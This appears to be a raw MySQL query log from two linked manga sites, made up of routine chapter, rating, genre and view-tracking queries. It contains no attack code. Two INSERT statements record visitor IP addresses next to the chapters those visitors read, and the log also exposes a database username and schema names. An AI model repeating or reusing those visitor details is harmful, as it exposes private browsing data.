u317079482_mangacherri_2 using Socket 330641591 Query select * FROM chapters where id = '12459' 330641591 Quit 330641592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641592 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12459' 330641592 Quit 330641593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641593 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12459', '15.235.98.227', 'mangacherri.com', '2026-02-26 03:28:07', '2026-02-26 03:28:07') 330641593 Quit 330641594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641594 Query select * FROM chapter_images where chapter_id = '12459' 330641594 Quit 330641595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641595 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330641596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641595 Quit 330641596 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 260225 19:28:08 330641596 Quit 330641597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641598 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641597 Quit 330641598 Quit 330641599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641599 Quit 330641600 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641600 Quit 330641601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641602 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641601 Quit 330641602 Quit 330641603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641603 Quit 330641604 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330641604 Quit 260225 19:28:09 330641605 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641606 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641605 Quit 330641606 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY (k.id * FLOOR(1 + RAND() * 100000)) % 100000 DESC limit 10 330641606 Quit 330641607 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641607 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 50 330641607 Quit 330641608 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641608 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330641608 Quit 330641609 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641610 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641609 Quit 330641610 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330641610 Quit 330641611 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330641611 Quit 330641612 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330641612 Quit 330641613 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330641613 Quit 330641614 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330641614 Quit 330641615 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '148' order by created desc 330641615 Quit 330641616 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330641616 Quit 330641617 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330641617 Quit 330641618 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330641618 Quit 330641619 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330641619 Quit 330641620 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330641620 Quit 330641621 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330641621 Quit 330641622 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641622 Query select * FROM chapters where manga_id = '262' order by created desc limit 1 330641622 Quit 330641623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330641623 Quit 330641624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641624 Query select * FROM chapters where manga_id = '237' order by created desc limit 1 330641624 Quit 330641625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330641625 Quit 330641626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641626 Query select * FROM chapters where manga_id = '257' order by created desc limit 1 330641626 Quit 330641627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330641627 Quit 330641628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641628 Query select * FROM chapters where manga_id = '216' order by created desc limit 1 330641628 Quit 330641629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330641629 Quit 330641630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641630 Query select * FROM chapters where manga_id = '275' order by created desc limit 1 330641630 Quit 330641631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330641631 Quit 330641632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641632 Query select * FROM chapters where manga_id = '292' order by created desc limit 1 330641632 Quit 330641633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330641633 Quit 330641636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641636 Query select * FROM chapters where manga_id = '270' order by created desc limit 1 330641634 Quit 330641635 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2027' 330641636 Quit 330641637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641635 Quit 330641637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330641637 Quit 330641638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641638 Query select * FROM chapters where id = '2027' 330641639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641639 Query select * FROM chapters where manga_id = '24' order by created desc limit 1 330641638 Quit 330641640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641640 Query select * FROM chapters where manga_id = '51' order by id desc 330641639 Quit 330641641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330641641 Quit 330641642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641642 Query select * FROM chapters where manga_id = '169' order by created desc limit 1 330641642 Quit 330641643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330641643 Quit 330641644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641644 Query select * FROM chapters where manga_id = '172' order by created desc limit 1 330641644 Quit 330641645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330641645 Quit 330641646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641646 Query select * FROM chapters where manga_id = '230' order by created desc limit 1 330641646 Quit 330641647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330641647 Quit 330641648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641648 Query select * FROM chapters where manga_id = '267' order by created desc limit 1 330641648 Quit 330641649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330641649 Quit 330641650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641650 Query select * FROM chapters where manga_id = '271' order by created desc limit 1 330641650 Quit 330641651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330641651 Quit 330641652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641652 Query select * FROM chapters where manga_id = '277' order by created desc limit 1 330641652 Quit 330641653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330641653 Quit 330641654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641654 Query select * FROM chapters where manga_id = '300' order by created desc limit 1 330641654 Quit 330641655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330641655 Quit 330641656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641640 Quit 330641656 Query select * FROM chapters where manga_id = '304' order by created desc limit 1 330641657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641657 Query Update chapters set view=view+1 where id = '2027' 330641656 Quit 330641658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330641658 Quit 330641659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641659 Query select * FROM chapters where manga_id = '303' order by created desc limit 1 330641657 Quit 330641660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641659 Quit 330641660 Query select * FROM chapters where id = '2027' 330641661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330641661 Quit 330641662 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641662 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330641660 Quit 330641663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641663 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2027' 330641664 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330641662 Quit 330641664 Quit 330641663 Quit 330641665 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641665 Query select * FROM chapters where manga_id = '281' order by created desc limit 1 330641666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641666 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('51', '2027', '115.70.62.74', 'mangacherri.com', '2026-02-26 03:28:09', '2026-02-26 03:28:09') 330641665 Quit 330641667 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330641667 Quit 330641666 Quit 330641668 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641668 Query select * FROM chapters where manga_id = '291' order by created desc limit 1 330641669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641669 Query select * FROM chapter_images where chapter_id = '2027' 330641668 Quit 330641669 Quit 330641670 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330641670 Quit 330641671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641671 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '51' and m.active = 1 330641672 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641672 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330641672 Quit 330641673 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330641673 Quit 330641674 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641674 Query select * FROM chapters where manga_id = '251' order by created desc limit 1 330641674 Quit 330641675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330641675 Quit 330641676 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641676 Query select * FROM chapters where manga_id = '246' order by created desc limit 1 330641676 Quit 330641677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330641677 Quit 330641678 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641678 Query select * FROM chapters where manga_id = '241' order by created desc limit 1 330641678 Quit 330641679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330641679 Quit 330641680 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641680 Query select * FROM chapters where manga_id = '222' order by created desc limit 1 330641680 Quit 330641671 Quit 330641681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330641682 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330641681 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='51' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330641682 Quit 330641683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641683 Query select * FROM chapters where manga_id = '221' order by created desc limit 1 330641683 Quit 330641684 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330641684 Quit 330641685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641685 Query select * FROM chapters where manga_id = '211' order by created desc limit 1 330641685 Quit 330641686 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330641686 Quit 330641687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641687 Query select * FROM chapters where manga_id = '210' order by created desc limit 1 330641687 Quit 330641688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330641688 Quit 330641689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641689 Query select * FROM chapters where manga_id = '202' order by created desc limit 1 330641689 Quit 330641690 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330641690 Quit 330641691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641691 Query select * FROM chapters where manga_id = '181' order by created desc limit 1 330641691 Quit 330641692 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '162' order by created desc 330641692 Quit 330641693 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641693 Query select * FROM chapters where manga_id = '162' order by created desc limit 1 330641693 Quit 330641694 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '161' order by created desc 330641694 Quit 330641695 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641695 Query select * FROM chapters where manga_id = '161' order by created desc limit 1 330641695 Quit 330641696 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330641696 Quit 330641697 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641697 Query select * FROM chapters where manga_id = '159' order by created desc limit 1 330641697 Quit 330641698 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330641698 Quit 330641699 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641699 Query select * FROM chapters where manga_id = '151' order by created desc limit 1 330641699 Quit 330641700 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330641700 Quit 330641701 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641701 Query select * FROM chapters where manga_id = '146' order by created desc limit 1 330641701 Quit 330641702 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330641702 Quit 330641703 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641703 Query select * FROM chapters where manga_id = '138' order by created desc limit 1 330641703 Quit 330641704 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330641704 Quit 330641705 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641705 Query select * FROM chapters where manga_id = '135' order by created desc limit 1 330641705 Quit 330641706 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330641706 Quit 330641707 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641707 Query select * FROM chapters where manga_id = '131' order by created desc limit 1 330641707 Quit 330641708 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330641708 Quit 330641709 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641709 Query select * FROM chapters where manga_id = '119' order by created desc limit 1 330641709 Quit 330641710 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330641710 Quit 330641711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641711 Query select * FROM chapters where manga_id = '116' order by created desc limit 1 330641711 Quit 330641712 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330641712 Quit 330641713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641713 Query select * FROM chapters where manga_id = '132' order by created desc limit 1 330641713 Quit 330641714 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330641714 Quit 330641715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641715 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330641715 Quit 330641716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330641716 Quit 330641717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641717 Query select * FROM chapters where manga_id = '26' order by created desc limit 1 330641717 Quit 330641718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330641718 Quit 330641719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641719 Query select * FROM chapters where manga_id = '193' order by created desc limit 1 330641719 Quit 330641720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330641720 Quit 330641721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641721 Query select * FROM chapters where manga_id = '284' order by created desc limit 1 330641721 Quit 330641722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330641722 Quit 330641723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641723 Query select * FROM chapters where manga_id = '236' order by created desc limit 1 330641723 Quit 330641724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330641724 Quit 330641725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641725 Query select * FROM chapters where manga_id = '256' order by created desc limit 1 330641725 Quit 330641726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330641726 Quit 330641727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641727 Query select * FROM chapters where manga_id = '25' order by created desc limit 1 330641727 Quit 330641728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330641728 Quit 330641729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641729 Query select * FROM chapters where manga_id = '189' order by created desc limit 1 330641729 Quit 330641730 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330641730 Quit 330641731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641731 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330641731 Quit 330641732 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330641732 Quit 330641733 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330641733 Quit 330641734 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330641734 Quit 330641735 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330641735 Quit 330641736 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330641736 Quit 330641737 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330641737 Quit 330641738 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330641738 Quit 330641739 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330641739 Quit 330641740 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330641740 Quit 330641741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330641741 Quit 330641742 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330641742 Quit 330641743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330641743 Quit 330641744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330641744 Quit 330641745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330641745 Quit 330641746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330641746 Quit 330641747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330641747 Quit 330641748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330641748 Quit 330641749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330641749 Quit 330641750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330641750 Quit 330641751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330641751 Quit 330641752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330641752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = 